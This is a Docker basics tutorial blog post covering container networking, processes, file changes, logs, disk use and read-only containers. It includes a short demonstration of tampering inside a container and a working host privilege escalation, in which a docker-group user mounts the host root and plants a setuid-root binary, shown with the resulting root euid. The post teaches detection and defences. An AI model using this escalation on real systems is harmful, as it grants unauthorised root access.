Looking at how a Docker container runs

24 Jun 2017, 09:53

container / docker / basics / dockerbasics

In the previous entry we looked at how a Docker container image is built.

In this entry we’re going to look a little bit about how a container runs.

Let’s take another look at the container we built last time, running apache:

% cat Dockerfile
FROM centos

RUN yum -y update
RUN yum -y install httpd

CMD ["/usr/sbin/httpd","-DFOREGROUND"]

% docker build -t web-server .

% docker run --rm -d -p 80:80 -v $PWD/web_base:/var/www/html \
-v /tmp/weblogs:/var/log/httpd web-server
63250d9d48bb784ac59b39d5c0254337384ee67026f27b144e2717ae0fe3b57b

% docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
63250d9d48bb        web-server          "/usr/sbin/httpd -..."   2 minutes ago       Up 2 minutes        0.0.0.0:80->80/tcp   modest_shirley

So how does network traffic get into this container? And what does that -p flag mean?

Basic Docker networking

By default, Docker creates a bridge called docker0. This bridge is not connected to the primary network, so there’s no communication to containers on this bridge. The bridge is associated with a private network.

When a container starts up, it is given a virtual ethernet (veth) device, that allows for IP communication between the host and the container. Inside the container it looks just like a normal network device.

This veth device is added to the bridge, and an IP address associated.

With our test Apache container we can see how this looks:

% brctl show
bridge name     bridge id               STP enabled     interfaces
docker0         8000.024234e17ca9       no              veth336564a

% ip -4 addr show dev docker0
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    inet 172.17.0.1/16 scope global docker0
       valid_lft forever preferred_lft forever

%  docker inspect --format='{{ .NetworkSettings.IPAddress }}' modest_shirley
172.17.0.2

So we can see our container’s “veth” device is on the bridge. The bridge itself has an IP address (172.17.0.1) on a /16 network (allowing for 65k addresses). Our container has an address 172.17.0.2 on this network.

We’ve effectively created a private network, 172.17.0.0/16; the host acts as the default gateway for the containers.

Now, of course, the rest of your network (other hosts, etc) do not know how to reach this private network, so a set of iptable rules are created so that outgoing traffic from the container is NAT’d to the host’s IP address. In this way containers can reach out to the main network.

Incoming traffic needs to be port forwarded, and this is set up with the -p flag; you can specify a port on the host and the port on the container it should move to. So -p 80:80 means forward port 80 from the host to port 80 inside the container.

It gets a little messy handling traffic from the outside network to the container, traffic between containers, and traffic from the container to itself

% ps -ef | grep docker-proxy
root     10054   760  0 10:18 ?        00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.17.0.2 -container-port 80

% sudo iptables -v -t nat -L POSTROUTING
Chain POSTROUTING (policy ACCEPT 11 packets, 754 bytes)
 pkts bytes target     prot opt in     out     source               destination         
   78  4961 MASQUERADE  all  --  any    !docker0  172.17.0.0/16        anywhere            
    0     0 MASQUERADE  tcp  --  any    any     172.17.0.2           172.17.0.2           tcp dpt:http

% sudo iptables -v -t nat -L DOCKER     
Chain DOCKER (2 references)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 RETURN     all  --  docker0 any     anywhere             anywhere            
    0     0 DNAT       tcp  --  !docker0 any     anywhere             anywhere             tcp dpt:http to:172.17.0.2:80

Exercise for those following on at home. See what other rules are in the complete iptables output, including the main FORWARD chain

This is just the default; it can be changed!

Container processes

With the CMD entry we told the Docker daemon to start this container by running the httpd process. We know Apache creates a number of child processes. We can see this, pretty easily:

% docker top modest_shirley
UID                 PID                 PPID                C                   STIME               TTY                 TIME                CMD
root                6458                6442                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6471                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6472                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6473                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6474                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6475                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND

Note the PIDs are those as seen from the host. When we go inside the container, later, we’ll see the PID numbers look different

Container files

The normal running of program like Apache causes temporary files to be generated (eg the PID file, at the very least). Your app may make use of /tmp, or /run or other areas.

By default Docker running containers are transient; when you shut them down the changes are lost. But while they’re running we can see what changes have been made:

We can see what files have changed

% docker diff modest_shirley
C /run
A /run/mount
A /run/mount/utab
C /run/httpd
A /run/httpd/httpd.pid
A /run/httpd/authdigest_shm.1

Note the log files don’t show because they’re not part of the container image; they were written to a mounted volume (-v flag)

Going inside the container

We’ve seen some ways of looking at a container from the outside, using the docker top and docker diff commands. But what does the container look like from the inside? We can use docker exec to run a command. (The details of how it works involve selecting the same namespaces for your new container, but you can think of it as if you were running a new process inside the container)

The filesystem from inside

% docker exec -it modest_shirley /bin/sh
sh-4.2# ls
anaconda-post.log  dev   lib         media  proc  sbin  tmp
bin                etc   lib64       mnt    root  srv   usr
boot               home  lost+found  opt    run   sys   var

The filesystem looks like a normal CentOS one.

sh-4.2# df -h
Filesystem        Size  Used Avail Use% Mounted on
/dev/mapper/docker-252:1-131082-0940ddeec345786e6a77a45645d662721d239266ede70f2620b21d4abe11ad0d
                   10G  355M  9.7G   4% /
tmpfs             245M     0  245M   0% /dev
tmpfs             245M     0  245M   0% /sys/fs/cgroup
/dev/mapper/dockerce-fs                                                         
                  8.8G   23M  8.3G   1% /etc/hosts
shm                64M     0   64M   0% /dev/shm
/dev/vda3         3.0G  1.6G  1.3G  56% /var/log/httpd
tmpfs             245M     0  245M   0% /sys/firmware

If you look carefully, you can see some “data leakage”. For example, the /var/log/httpd has exposed the filesystem mount point /dev/vda3 (which is where /tmp lives on my test machine). The root disk is showing how much space I allocated to the docker data volume.

Other data may be exposed, eg via the dmesg command

sh-4.2# dmesg | grep Hypervisor
[    0.000000] Hypervisor detected: KVM

We can see that Docker, in its default setup, doesn’t hide so much of the host machine as we might like! That’s the consequence of a virtualised OS, as opposed to virtualised hardware.

Processes from inside

sh-4.2# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       5     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       6     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       7     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       8     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       9     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
root        27     0  1 14:22 ?        00:00:00 /bin/sh
root        31    27  0 14:22 ?        00:00:00 ps -ef

Note the PIDs; the container has its own PID namespace and so our first Apache process now shows as PID 1. Recall, from earlier, that it showed as 6458 in the docker top output.

Networking from inside

This image doesn’t have an ip or ifconfig command inside, but if it did (or if we copied it in) then the output would look something like:

4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP  link-netnsid 0
    inet 172.17.0.2/16 scope global eth0
       valid_lft forever preferred_lft forever

Similarly the routing table would look like

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         172.17.0.1      0.0.0.0         UG        0 0          0 eth0
172.17.0.0      0.0.0.0         255.255.0.0     U         0 0          0 eth0

So we can see it shows as a normal network interface, with a default route to the bridge IP address.

Output from a Docker container

A program may send output to stdout or stderr. In a normal VM this might be considered the equivalent of the console. Docker allows us to inspect this as well. Let’s create a simple container that just writes out a line once a minute

#!/bin/sh
while [ 1 ]
do
  echo Hello, the time is `date`
  sleep 1
done

Let’s run this:

% docker run --rm -d timeloop 
c03f1a63e4c7e55ab37c973a2fe231621340c48aae633865049f2588168b1c1e

% docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
c03f1a63e4c7        timeloop            "/hello"            7 seconds ago       Up 2 seconds                            eloquent_torvalds

% docker logs eloquent_torvalds
Hello, the time is Sat Jun 24 14:55:19 UTC 2017
Hello, the time is Sat Jun 24 14:55:20 UTC 2017
Hello, the time is Sat Jun 24 14:55:21 UTC 2017
Hello, the time is Sat Jun 24 14:55:22 UTC 2017

Docker supports different logging modules; we can see what one the container is using:

% docker inspect -f '{{.HostConfig.LogConfig.Type}}' eloquent_torvalds
json-file

This is the default driver and has no default limits; can fill up the disk!

Being nasty

We’ve seen enough in this blog entry to see how we can be nasty. If you look closely, you’ll notice that we did docker exec we were root inside the container. We can abuse this!

sh-4.2# rpm -e passwd
sh-4.2# cat > /bin/passwd
echo Hahahahaha
sh-4.2# chmod 755 /bin/passwd
sh-4.2#

OK, that’s not much of an abuse, but it shows we can make changes.

Fortunately we can detect this type of abuse:

% docker diff modest_shirley
C /root
A /root/.bash_history
[ ... ]
C /etc
C /etc/pam.d
D /etc/pam.d/passwd
C /var
C /var/lib
C /var/lib/rpm
[ ... ]
C /usr/bin
C /usr/bin/passwd
[ ... ]

If we know what files should change (the /tmp and /run files?) then we may be able to use this for intrusion detection (only if filesystem artifacts are left behind) and File Integrity Monitoring (FIM).

Changes are transient

If we destroy and recreate this container then those changes are lost and a “virgin” image is restarted.

% docker kill modest_shirley
modest_shirley

% docker run --rm -d -p 80:80 -v $PWD/web_base:/var/www/html -v /tmp/weblogs:/var/log/httpd web-server
2118033d42f2fe6bfe10861e838adb7a5df0c408431ba070d77ff6fa213ff45d

% docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
2118033d42f2        web-server          "/usr/sbin/httpd -..."   3 seconds ago       Up 3 seconds        0.0.0.0:80->80/tcp   compassionate_liskov

% docker diff compassionate_liskov
C /run
C /run/httpd
A /run/httpd/authdigest_shm.1
A /run/httpd/httpd.pid

This is useful for recovering from a broken container, but it loses a potentially useful audit trail (which could hamper incident response).

Keeping changes after termination

We can keep terminated containers by not using the --rm flag, but this will start using up disk space.

To demonstrate this I created a simple container that just creates three files and terminates (by now you should be able to do this yourself, so I won’t show the Dockerfile or script).

We’ll run it without the --rm flag:

% docker image ls change
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
change              latest              7627c3a09d4e        30 minutes ago      124 MB

% docker run change

% docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES

The container doesn’t show in the ps listing. We need to use an additional flag to show these terminated containers:

% docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                     PORTS               NAMES
b216fbcca2c0        change              "/hello"            7 seconds ago       Exited (0) 6 seconds ago                       naughty_sinoussi

There it is!

Because the results have been kept around we can inspect it and even pull the contents.

% docker diff naughty_sinoussi
C /tmp
A /tmp/testfile2
C /run
A /run/testfile3
A /testfile1

% docker cp naughty_sinoussi:/tmp/testfile2 - | tar tvf -
-rw-r--r-- 0/0              29 2017-06-09 14:40 testfile2

% docker cp naughty_sinoussi:/tmp/testfile2 - | tar xOf - testfile2
I am modifying a file in tmp

The docker cp command is useful; it can be used to extract (or push!) files and directories from a container. The output is in a tar format. You can do this on running containers as well.

Finally we can clear this up:

% docker rm naughty_sinoussi
naughty_sinoussi

Disk space used

Obviously keeping these changes (and “console” log output) around takes up disk space. But how much?

Let’s start with a clean system:

% docker info | grep Space.Used
 Data Space Used: 840.2 MB
 Metadata Space Used: 1.217 MB

% docker system df
TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
Images              10                  0                   660.8 MB            660.8 MB (100%)
Containers          0                   0                   0 B                 0 B
Local Volumes       0                   0                   0 B                 0 B

Now let’s run the docker run change command 100 times (obviously by cheating and run it in a loop).

Now how much space is used?

 Data Space Used: 1.45 GB
 Metadata Space Used: 6.554 MB

Images              10                  1                   660.8 MB            660.8 MB (99%)
Containers          100                 0                   8.8 kB              8.8 kB (100%)
Local Volumes       0                   0                   0 B                 0 B

Now I know my script changes around 88 bytes of data inside the container. The df command only shows a 8.8K increase in size (which matches 88 bytes changed in 100 containers), but the info command shows usage has grown by over 600M

Important note: The df command is slow with so many terminated containers

This gives us the ability to create a management process around running containers. For example we could start them up without the --rm flag. Periodically during the running we can check the docker diff results and if something looks bad we can alert the SOC. Potentially terminate the container. Similarly on container termination we can check the diff results and if that looks clean then we can rm the results to recover disk space, or else retain it for forensic analysis.

Read-only containers

There’s another way of running Docker that can help protect against modification: use the --read-only flag. With this the whole filesystem is made immutable. Now your normal app requires some temporary space; we can do this with --tmpfs. Annoyingly the permissions on /run may not be correct, so we can create a simple startup wrapper.

Going back to our Apache example, we build it the same way but with a startup wrapper instead

% cat startup
#!/bin/sh
mkdir -m 0777 /run/httpd
exec /usr/sbin/httpd -DFOREGROUND

% cat Dockerfile
FROM centos
RUN  yum -y update
RUN  yum -y install httpd
ADD /startup /
CMD ["/startup"]

% docker build -t readonly-web .

% docker run -d --rm --read-only -p80:80 -v $PWD/web_base:/var/www/html:ro -v /tmp/weblogs:/var/log/httpd --tmpfs /run --tmpfs /tmp readonly-web

Note the :ro on the /var/www/html directory to make the html tree also immutable, and /run and /tmp are set as tmpfs directories

If we try to make changes inside the container it fails, but the web server can still write out its logs

% docker exec -it f17484a0529f /bin/sh
sh-4.2# touch /foo
touch: cannot touch '/foo': Read-only file system

sh-4.2# rpm -e passwd
error: can't create transaction lock on /var/lib/rpm/.rpm.lock (Read-only file system)

sh-4.2# touch /tmp/foo

sh-4.2# touch /var/www/html/bar
touch: cannot touch '/var/www/html/bar': Read-only file system

sh-4.2# tail -1 /var/log/httpd/error_log
[Mon Jun 12 17:01:11.024721 2017] [core:notice] [pid 1] AH00094: Command line: '/usr/sbin/httpd -D FOREGROUND'

A bit of a gotcha, here, is that docker diff shows no files have changed, which may hide intrusion indicators! We’ve been inside the container and looked around, but no history file was generated. This may be a small price for preventing abuse in the first place.

Being nasty outside the container

We can take what we’ve learned and use that to break into the host.

For example, we could map the root directory!

% docker run --rm -it -v /:/mnt centos /bin/sh
sh-4.2# cp /bin/id /mnt/tmp/badperson
sh-4.2# chmod 4711 /mnt/tmp/badperson
sh-4.2# exit
exit

% id
uid=500(sweh) gid=500(sweh) groups=500(sweh),499(docker)

% /tmp/badperson
uid=500(sweh) gid=500(sweh) euid=0(root) groups=500(sweh),499(docker)

Note the euid has changed.

If you give a normal user permission to run the docker command (which, basically, means being in the docker group) then they have effective root on the whole machine.

SELinux can mitigate this, to some extent, by preventing the container from having permissions to modify stuff. Indeed, I had to disable SELinux to do this test. These security features are there for a reason, but sometimes they’re disabled.

The best defense is to not allow people to be in the docker group in the first place!

Summary

In this blog entry we’ve looked at the running container:

Networking, Processes, file changes
Container stdout/stderr logs
Abusing docker privileges (root exploit!)
- And how we can detect this
- Some protections we can do against this

Docker also has a lot of advanced security functions (SELinux, AppArmour, seccomp, capabilities) which can protect the system and the application. These are beyond the scope of this “basics” blog entry, but are definitely something an enterprise user of Docker needs to be aware of.

Networking, files, logs, basic security